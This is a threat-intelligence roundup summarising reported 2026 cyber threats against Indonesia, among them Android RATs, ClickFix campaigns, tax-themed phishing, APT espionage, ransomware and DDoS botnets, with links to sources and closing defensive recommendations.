source: https://www.hendryadrian.com/dashboard/#explorer
Keypoints
- Indonesia in 2026 faces a multi-vector threat landscape spanning financial fraud, mobile malware, espionage, and ransomware across government, banking, telecom, and critical infrastructure.
- SURXRAT V5 Android RAT demonstrates malware-as-a-service capabilities, intercepting OTPs and enabling financial fraud with AI-assisted evasion.
- ClickFix campaigns distribute the MIMICRAT RAT via compromised sites and Indonesian-language lures to bypass security, steal tokens, and maintain persistence.
- Coretax phishing campaigns impersonate tax officers via WhatsApp, distributing malicious APKs and intercepting OTPs to achieve remote banking takeovers.
- Ransomware escalation and large-scale threats from groups like The Gentlemen, Lotus Blossom, Fancy Bear, Amaranth-Dragon, Shadow Campaigns, and AISURU/Kimwolf threaten national security and critical services.
Indonesia faces an increasingly complex cyber threat landscape in 2026, ranging from large-scale financial fraud and mobile malware to state-sponsored espionage and ransomware. As digital adoption accelerates across government, banking, telecom, and critical infrastructure sectors, threat actors are intensifying operations that target both institutions and ordinary citizens.
Cyber Scam Threats Facing Indonesia
Indonesia is heavily impacted by large-scale scam ads, phishing, and malware campaigns similar to those pursued legally by Meta. These operations involve celebrity-bait fraud, investment “pig butchering” schemes, DNS hijacking via compromised routers, and malicious push notifications. Indonesian users are lured through social media platforms, with financial data harvested and malware widely distributed.
Feb 27 (2026) – https://thehackernews.com/2026/02/meta-files-lawsuits-against-brazil.html
Emerging Android RAT Threats in Indonesia
The malware-as-a-service Android RAT SURXRAT V5, derived from ArsinkRAT, has been linked to Indonesian threat actors. By abusing gaming apps and Android Accessibility Services, it enables OTP interception, financial fraud, ransomware-style locking, and AI-assisted evasion. Indonesian Android users face heightened risks of account takeover, data theft, and mobile extortion.
Feb 25 (2026) – https://thecyberexpress.com/surxrat-arsinkrat-llm-android-rat-analysis/
ClickFix Malware Campaign Targeting Indonesian Users
Advanced ClickFix campaigns distribute the custom MIMICRAT remote access trojan via compromised websites and localized Indonesian-language lures. Victims are tricked into executing malicious PowerShell commands, allowing attackers to bypass security controls, steal tokens, and maintain persistent access. The campaign mirrors activity previously analyzed by Elastic Security Labs.
Feb 20 (2026) – https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks
Coretax Phishing and Mobile Banking Fraud
A nationwide phishing and mobile malware campaign abused Indonesia’s Coretax platform. Attributed to the GoldFactory group and reported by Group-IB, attackers impersonated tax officers via WhatsApp, distributed malicious APKs, intercepted OTPs, and performed remote banking takeovers, causing significant financial losses.
Feb 19 (2026) – https://www.infosecurity-magazine.com/news/fake-coretax-apps-fraud-indonesia/
State-Sponsored Espionage Targeting Indonesia
Several advanced persistent threat (APT) groups have targeted Indonesia in 2026:
- Lotus Blossom conducted long-term espionage across Southeast Asia, abusing supply chains such as Notepad++ updates to infiltrate government and telecom networks.
- Fancy Bear (APT28) targeted government, defense, and energy sectors through spear-phishing and rapid exploitation of Microsoft Office vulnerabilities.
- Amaranth-Dragon weaponized the WinRAR vulnerability CVE-2025-8088 using fake civil servant salary decree files to infect Indonesian government agencies.
- Shadow Campaigns by TGR-STA-1030/UNC6619 compromised an Indonesian airline and government-linked entities using Exchange exploits, Cobalt Strike, and Linux rootkits.
Feb 04–20 (2026) –
https://socradar.io/blog/dark-web-profile-lotus-blossom/
https://www.cyfirma.com/research/apt-profile-fancy-bear-3/
https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/
https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/
Ransomware Escalation in Indonesia
Indonesia ranks among the most targeted countries in Asia for ransomware. Groups such as The Gentlemen operate double-extortion RaaS models, exploiting exposed VPNs and Active Directory weaknesses to encrypt Windows, Linux, and ESXi systems. Government, BFSI, healthcare, telecom, and manufacturing sectors face operational shutdowns and data leak threats.
Feb 12 (2026) – https://socradar.io/blog/dark-web-profile-the-gentlemen-ransomware/
Hyper-Volumetric DDoS and Botnet Threats
The AISURU/Kimwolf botnet has launched record-breaking 31.4 Tbps DDoS floods. Indonesia functions both as a target and as a source of infected Android devices contributing to botnet traffic. Such attacks threaten telecom providers, gaming services, and digital economy platforms with large-scale service disruption.
Feb 05 (2026) – https://thehackernews.com/2026/02/aisurukimwolf-botnet-launches-record.html
Financial Sector Data Breach Risks
The alleged sale of 3 million customer records from a major Indonesian bank highlights systemic financial-sector exposure. Leaked data—including account types, balances, and SWIFT codes—raises risks of fraud, phishing escalation, and large-scale abuse within Indonesia’s banking and fintech ecosystem.
Jan 21 (2026) – https://asec.ahnlab.com/en/92207/
Critical Infrastructure and Satellite Sector Breaches
Infostealer-driven credential theft has exposed cloud platforms used by global enterprises and Indonesia’s own PT Pasifik Satelit Nusantara. Attackers leveraged stolen credentials and weak multi-factor authentication controls to access sensitive satellite and aerospace project data, posing espionage and national security risks.
Jan 05 (2026) – https://www.infostealers.com/article/dozens-of-global-companies-hacked-via-cloud-credentials-from-infostealer-infections-more-at-risk/s
Expanding “Blast Radius” and AI Abuse
Indonesia also faces emerging risks from AI misuse, including deepfake abuse linked to tools developed by xAI. Combined with ransomware, identity-based attacks, and supply-chain compromises, cyber incidents now have a broader “blast radius,” potentially impacting public services, regulatory stability, and national economic resilience.
Jan 14 (2026) – https://therecord.media/california-grok-deepfakes-investigation
Conclusion
The cyber threat environment in Indonesia throughout 2026 demonstrates a convergence of financial cybercrime, advanced espionage, ransomware escalation, and infrastructure-focused attacks. Strengthening multi-factor authentication, mobile security, supply-chain defenses, and cross-sector coordination will be essential to reducing systemic risk across the nation’s expanding digital ecosystem.